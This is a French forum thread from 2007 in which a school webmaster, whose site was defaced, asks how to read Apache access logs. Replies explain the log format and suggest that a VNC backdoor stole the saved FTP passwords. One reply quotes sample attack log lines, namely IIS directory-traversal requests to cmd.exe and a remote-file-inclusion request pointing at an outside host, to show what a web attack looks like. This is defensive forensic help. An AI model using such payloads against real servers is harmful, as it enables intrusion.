[urgent, mon site: hacké] comment lire des fichiers acess_log ?

comment lire des fichiers acess_log ? [urgent, mon site: hacké] - Hébergement - Réseaux grand public / SoHo

Marsh Posté le 29-10-2007 à 11:08:30    

bonjour
 
ce week end le site du bahut ou je travail a été hacké : on m'a viré le contenu du repertoire et remplacé par du porno (super , c'est les parents d'eleve qui nous ont prevenus)
j'ai modifié tous les mots de passe mais maintenant je voudrais faire mon enquete (au moins savoir si c'est quelqu'un qu'aurait tripoté mon ordi portable ou si c'est du hacking en bonne et due forme)
le site a ete hacké deux fois et je sais qu'il a été publié vendredi entre 18H  et 20H30  au plus large. J'ai sur ma console d'administration (je suis hebergé par nexlink) les logs de connection, j'ai telechargé en particulier les access_log qui devraient me permettre de connaitre les connection a la console d'admin. . Est ce que ça peut m'etre utile pour retrouver eventuellement  une adresse ip? avec quel soft me conseillez vous de lire ces logs pour avoir des details? car avec le bloc note je n'y comprends rien  
si vous avez des conseils ou des infos, merci je suis plutot mauvais en webmastering


Message édité par ment@l le 29-10-2007 à 11:10:34
Reply

Marsh Posté le 29-10-2007 à 11:08:30   

Reply

Marsh Posté le 29-10-2007 à 11:13:18    

Google -> "apache access_log"
 
1er résultat :
 
http://httpd.apache.org/docs/2.0/logs.html
 
:hello:


---------------
- Si les cons volaient, il ferait nuit tout le temps ! -
Reply

Marsh Posté le 29-10-2007 à 11:14:52    

un grep déjà mais sinon je ne pense pas qu'il y ai des outils plus "graphique"

Reply

Marsh Posté le 29-10-2007 à 11:16:59    

merci a toi moon , mais désolé je n'y pige pas grand chose...d'autant que je pensais qu'apache ne concernait que le monde de linux...
je suis affligé par mon manque de conaissances dans ce domaine :(
il existe pas juste un soft que je puisse installer puis faire un fichier/ouvrir/access log et le lire dans une interface correcte ( en esperant que j'y pige quelque chose) ?


Message édité par ment@l le 29-10-2007 à 11:20:18
Reply

Marsh Posté le 29-10-2007 à 11:29:12    

Et bien tu l'ouvres dans le bloc notes, et tu lis chaque ligne comme indiqué sur la page que je t'ai indiquée. :)


---------------
- Si les cons volaient, il ferait nuit tout le temps ! -
Reply

Marsh Posté le 29-10-2007 à 11:35:58    

désolé, mais c'est dur...en anglais en plus, j'ai du mal
comment comprendre une ligne comme ça:[27/Oct/2007:00:15:09 +0100] "GET /imagesactu/noel1.jpg HTTP/1.1" 200 15828 "-" "Googlebot-Image/1.0"
78.114.37.204 - -  
je pensais que les logs access me donneraient les connexion a ma console de gestion...mais ça evoque pleins de fichiers du site


Message édité par ment@l le 29-10-2007 à 11:36:34
Reply

Marsh Posté le 29-10-2007 à 11:39:42    

ou alors cette ligne:
27/Oct/2007:14:11:28 +0100] "GET /index.htm HTTP/1.1" 304 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
spider-prs-ta09.proxy.aol.com - -
 
si je comprendsbien,  le 27 a 14h quelqu'un a modifié index .htm. et son IP n'apparait pas car il est derriere un proxy ? (spider-prs-ta09.proxy.aol.com)
 
merci pour votre aide les amis, je suis vraiment tres enmer embeté


Message édité par ment@l le 29-10-2007 à 11:40:45
Reply

Marsh Posté le 29-10-2007 à 11:39:58    

Les logs Apache te communiquent les accès aux fichiers dispo sur le serveur web, c'est à dire ton site.
 
Donc dans l'ordre :
 


date GET fichier HTTP/1.1 code_réponse taille fichier referer user_agent ip


 
En l'occurence c'est le bot google qui indexe ton site.


---------------
- Si les cons volaient, il ferait nuit tout le temps ! -
Reply

Marsh Posté le 29-10-2007 à 11:40:18    

Là ça te dis que l'ip 78.114.37.204 qui est le bot google a accédé avec succès (200) à l'image noel1.jpg qui fait 15828 octets le 27 octobre à minuit 15

Reply

Marsh Posté le 29-10-2007 à 11:42:48    

vous avez bien de la chance de parler cette langue :)
est ce qu' a votre avis il y a moyen avec ces fichiers access log de savoir un peu ce qui nous est arrivé, d'avoir des infos sur le hacker ?


Message édité par ment@l le 29-10-2007 à 11:47:06
Reply

Marsh Posté le 29-10-2007 à 11:42:48   

Reply

Marsh Posté le 29-10-2007 à 11:47:13    

Oui fais une recherche sur la page d'admin.
Cependant peut être que la personne a utilisé un autre moyen, la meilleur méthode est de tout checker

Reply

Marsh Posté le 29-10-2007 à 12:07:47    

qu'est ce que la page d'admin ?

Reply

Marsh Posté le 29-10-2007 à 13:05:54    

bah c'est toi qui parle de console d'admin

Reply

Marsh Posté le 29-10-2007 à 13:44:50    

pardon, je m'exprime mal : comment faire une recherche precisement sur la page d'admin ?

Reply

Marsh Posté le 30-10-2007 à 10:45:40    

il y'a personne qui aurait la patience d'aider un newbie comme moi ?
vous comprenez ce qui est arrivé etait assez humiliant pour notre ecole et j'aimerais savoir si la securité de nexlink laisse a desirer

Reply

Marsh Posté le 30-10-2007 à 10:51:00    

C'est un site cree de toutes pieces par toi ou un collegue, un site base sur de l'existant, statique ou dynamique ?


---------------
Votre couroux impitoiable Veut-il renverser l'Univers ?
Reply

Marsh Posté le 09-11-2007 à 10:10:45    

salut les amis
je reviens a la charge avec plus d'explications:

 

tout d'abord le site , c'est un site en html tout bete que j'ai fait et que j'administre

 

j'ai trouvé un trojan sur une des machines que j'utilise pour publier le site , il s'agit de backdoor win32 vnc
ç'est probablement la source du probleme

 

pour les logs: mon probleme etait que dans le bloc note il n'yavait aucun saut de ligne, j'ai ouvert ça dans firefox et là, miracle, j'y vois beaucoup plus claire

 

il n'a pas grand chose sur ces logs...surtout des get, mais il y'a UN truc , qui je pense est important

 

à 16h46 , heure ou je suis en bagnole en train de rentrer chez moi, voila ce qu'il y'a:
*APoitiers-154-1-14-95.w86-196.abo.wanadoo.fr - - [26/Oct/2007:16:46:57 +0100] "_POST /index.htm HTTP/1.1_" 200 4753 "http://..........." "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"

 

donc si je me trompe pas, c'est un accés a la console d'admin , c'est le fichier index qui est publié
j'ajoutequ'on m'a prevenu que le site etait hacké vers 17h, ça correspond

 

est ce que je tiens mon gars ?
qu'est ce que je fais maintenant les amis?


Message édité par Wolfman le 09-11-2007 à 21:32:42
Reply

Marsh Posté le 09-11-2007 à 19:20:05    

Tu combles la faille...

Reply

Marsh Posté le 09-11-2007 à 21:33:21    

ment@l -> si tu mets l'adresse de ta console d'administration, c'est encore la meilleure façon de se faire hacker...

Reply

Marsh Posté le 10-11-2007 à 11:32:19    

mince...
mais j'ai quand meme viré le trojan et changé tous les mots de passe  :ouch:

Reply

Marsh Posté le 12-11-2007 à 14:46:22    

sinon...personne ne voudrait m'aider en repondant a cette question :
le log que j'ai posté me permet il d'etre sur de bien tenir le gars qui m'a hacké le site ? (dans la mesure ou c'est un acces console, et que ce n'est pas moi...)

Reply

Marsh Posté le 14-11-2007 à 14:17:07    

bon...ben je suis étonné , personne ne veut m'apporter la moindre aide sur ce coup?

Reply

Marsh Posté le 15-11-2007 à 06:38:06    

Une console d'admin en racine du serveur http, c'est pas malin malin :o

 

sinon, je pense sincèrement que les logs ftp te seront plus utiles que tes logs apache  [:totozzz]
surtout si on a piraté une machine client avec un backdoor vnc et que ton site est en html sans langage de prog derrière [:aloy] ton pirate a pompé les passwords de ton client ftp (c'est pas bien de les sauvegarder) et a du se connecter tout simplement... parce que remplacer des fichiers sur un apache sans cgi/php/perl derrière, c'est un peu dur ...

 

Tu aurais eu une attaque par apache, ca ressemblerais plus a des trucs du genre .. (avec des codes 200 a la fin :o)

 

218.92.63.250 - - [28/Sep/2006:17:16:17 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:19 +0200] "GET /scripts/root.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:20 +0200] "GET /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:46 +0200] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:47 +0200] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 404 -
210.245.226.61 - - [24/Mar/2007:13:01:02 +0100] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 232

Message cité 1 fois
Message édité par Manaloup le 15-11-2007 à 06:50:46
Reply

Marsh Posté le 15-11-2007 à 08:23:32    

Manaloup a écrit :

Une console d'admin en racine du serveur http, c'est pas malin malin :o
 
sinon, je pense sincèrement que les logs ftp te seront plus utiles que tes logs apache  [:totozzz]
surtout si on a piraté une machine client avec un backdoor vnc et que ton site est en html sans langage de prog derrière [:aloy] ton pirate a pompé les passwords de ton client ftp (c'est pas bien de les sauvegarder) et a du se connecter tout simplement... parce que remplacer des fichiers sur un apache sans cgi/php/perl derrière, c'est un peu dur ...  
 
Tu aurais eu une attaque par apache, ca ressemblerais plus a des trucs du genre .. (avec des codes 200 a la fin :o)
 
218.92.63.250 - - [28/Sep/2006:17:16:17 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:19 +0200] "GET /scripts/root.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:20 +0200] "GET /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:46 +0200] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:47 +0200] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 404 -
210.245.226.61 - - [24/Mar/2007:13:01:02 +0100] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 232


 
merci pour ton aide manaloup
 
pour la console d'admin a la racine du site, je crois que c'est nexlink, l'hebergeur qui decide ce genre de chose, non?
 
pour les logs, c'est les seuls que j'ai trouvé sur la console d'admin, et nexlink sont pas tres conciliants, surtout quand ils sentent qu'ils ont affaire  a un newb
 
le backdoor vnc, comment j'ai pu le choper, a il kek chose a voir avec ultravnc (que j'utilise)
 
merci pour le conseil cocernant le mot de passe ftp, je l'applique illico
 
pour ce qui est du log que j'ai affiché , le post index par la console d'admin a 16H46, est ce que tu pense que c'est mon pirate ?

Reply

Marsh Posté le 04-08-2008 à 18:06:35    

Je@nb a écrit :

un grep déjà mais sinon je ne pense pas qu'il y ai des outils plus "graphique"

 

ApHeMo - Apache Health Monitoring

 

http://www.xxxxxxxxxxxxxxxxxx.com/images/ahm_screen_s.gif

 

http://www.xxxxxxxxxxxxxxxxxxx.com/?aphemo
J'en suis le développeur, tu peux me contacter si t'as besoin d'un coup de main avec l'appli.


Message édité par freds45 le 05-08-2008 à 09:39:06
Reply

Marsh Posté le 05-08-2008 à 09:38:51    

Remonter un topic qui a bientôt un an histoire de faire de la pub, non. :/

Reply

Marsh Posté le    

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed